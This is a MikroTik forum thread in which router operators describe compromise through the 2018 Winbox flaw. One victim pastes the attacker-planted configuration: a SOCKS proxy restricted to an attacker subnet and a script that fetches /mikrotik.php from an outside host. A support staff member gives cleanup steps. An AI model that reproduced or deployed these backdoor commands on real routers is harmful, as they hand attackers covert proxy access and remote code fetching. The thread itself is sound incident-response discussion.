Community discussions

MikroTik App
 
saburtwo
just joined
Topic Author
Posts: 6
Joined: Sun Aug 05, 2018 11:55 pm

Mikrotik The Hack Continues following Winbox attack STP attack?

Mon Aug 06, 2018 12:18 am

Hi
So we have around 1000 routers in our network and we were hacked around a week ago due to the winbox password flaw
We found the source addresses of some of the attackers and bot nets so we blocked those
A few customers were off line for the last ROS upgrade and unfortunately they got hacked

I have here on the bench a hacked rb951 which I have been trying to access all weekend
Winbox, telnet and ssh blocked
So I decided to spoof the attackers IP's and use the same exploit they did to get the password, no luck so far so I must have missed their address and just got the bots

My concern is this
A few days ago after the attack we went to activate our new BGP only to realise the port was sending out STP, even though the port is not in a bridge it is totally isolated.
Here I have the hacked rb951 and it too is sending out lots of STP from its WAN
I just checked my own router with similar config which I netinstalled just yesterday and there is no STP on the WAN only the bridge as you would expect.

Anybody else witnessed this?
 
fkchong
just joined
Posts: 1
Joined: Thu Sep 13, 2018 10:16 am

Re: Mikrotik The Hack Continues following Winbox attack STP attack?

Thu Sep 13, 2018 10:39 am

i also have this issue, the password is change by someone "hacker"
i check back my last database is have something is add to my mikrotik,

/ip socks
set enabled=yes port=4153
/ip socks access
add action=deny src-address=!95.154.216.128/25
add action=deny src-address=!95.154.216.128/25
add action=deny src-address=!95.154.216.128/25

/system script
add name=script4_ owner=admin policy=ftp,reboot,read,write,policy,test,password,sensitive source=\
"/tool fetch address=95.154.216.163 port=2008 src-path=/mikrotik.php mode=http keep-result=no"

and also have this critical login failure

aug/03/2018 18:34:36 system,error,critical login failure for user admin from 95.154.216.151 via winbox
aug/03/2018 18:34:36 system,error,critical login failure for user admin from 95.154.216.151 via winbox
aug/22/2018 05:38:08 system,error,critical login failure for user admin from 95.154.216.151 via winbox
aug/22/2018 05:38:09 system,error,critical login failure for user admin from 95.154.216.151 via winbox
aug/22/2018 19:16:11 system,error,critical login failure for user admin from 95.154.216.151 via winbox
aug/22/2018 19:16:11 system,error,critical login failure for user admin from 95.154.216.151 via winbox


this all red color is not my setting at the mikrotik router, but is auto add to the router.
i also don't know about this ip address ........
 
User avatar
normis
MikroTik Support
MikroTik Support
Posts: 24855
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: Mikrotik The Hack Continues following Winbox attack STP attack?

Thu Sep 13, 2018 11:57 am

You have two choices

1) Netinstall with v6.43 and reconfigure it, this is the safe choice
2) Remove Scheduler rule, Scripts, SOCKS config and fix the firewall rules that the attackers have changed. CHANGE YOUR PASSWORD also.
No answer to your question? How to write posts

Who is online

Users browsing this forum: Bing [Bot], boxybh, danca, foresthus, palhaland, walidmadkour and 129 guests